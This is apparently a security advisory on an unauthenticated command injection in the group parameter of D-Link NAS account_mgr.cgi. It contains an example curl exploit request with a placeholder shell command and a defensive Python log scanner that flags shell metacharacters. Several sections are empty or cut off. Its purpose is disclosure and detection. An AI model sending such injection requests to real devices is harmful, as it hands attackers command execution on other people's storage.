Overview

A command injection vulnerability has been identified in the account_mgr.cgi URI of certain D-Link NAS devices. Specifically, the vulnerability exists in the handling of the group parameter used within the CGI script cgi_user_add command. This flaw allows an unauthenticated attacker to inject arbitrary shell commands through crafted HTTP GET requests, affecting over 61,000 devices on the Internet.

Affected Devices

Affected Components

The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The group parameter in this script does not adequately sanitize input, allowing for command execution.

CWE

CWE-77: Command Injection.

Exploitation

To exploit this vulnerability, an attacker sends a crafted HTTP GET request to the NAS device with malicious input in the group parameter. An example exploit request is as follows:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;<INJECTED_SHELL_COMMAND>;%27" 

This curl request constructs a URL that triggers the cgi_user_add command with a group parameter that includes an injected shell command.
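For defenders, the request shape above is easy to hunt for in web-server access logs, and the same allowlist check is what a fixed handler should apply to the group value. The following Python is an added example, not code from the advisory or from D-Link; it assumes a combined access-log format and a hypothetical group-name policy (letters, digits, `_`, `.`, `-`, up to 32 characters), and the log lines are constructed with placeholder IPs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Shell metacharacters that have no business in a group name.
SHELL_META = re.compile(r"""[;|&`$'"\n<>(){}]""")
# Allowlist for a legitimate group name (assumed policy, not D-Link's own).
VALID_GROUP = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def is_valid_group(value: str) -> bool:
    """Allowlist check a fixed account_mgr.cgi should apply before using group."""
    return VALID_GROUP.fullmatch(value) is not None

def is_injection_attempt(request_line: str) -> bool:
    """True if a request targets cgi_user_add with a suspicious group value."""
    parts = request_line.split()          # e.g. ['GET', '/cgi-bin/...', 'HTTP/1.1']
    if len(parts) < 2:
        return False
    url = urlsplit(parts[1])
    if not url.path.endswith("/account_mgr.cgi"):
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("cmd") != ["cgi_user_add"]:
        return False
    for group in params.get("group", []):
        decoded = unquote(group)          # also catch double-encoded payloads
        if SHELL_META.search(decoded) or not is_valid_group(decoded):
            return True
    return False

def scan_log(lines):
    """Return (line_number, client_ip) for log lines that look like exploitation."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Combined log format: ip - - [timestamp] "request line" status size
        m = re.match(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"', line)
        if m and is_injection_attempt(m.group(2)):
            hits.append((n, m.group(1)))
    return hits

# Constructed sample log lines; CMD stands in for whatever command was injected.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=staff HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;CMD;%27 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%2527%3BCMD%3B%2527 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, ip in scan_log(SAMPLE_LOG):
        print(f"line {n}: possible cgi_user_add injection from {ip}")
```

Only the two requests carrying quote and semicolon characters in group are reported; the legitimate add of group "staff" and the unrelated page fetch are not.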

Actual Result

Fix Recommendation

To remediate this vulnerability, it is recommended that: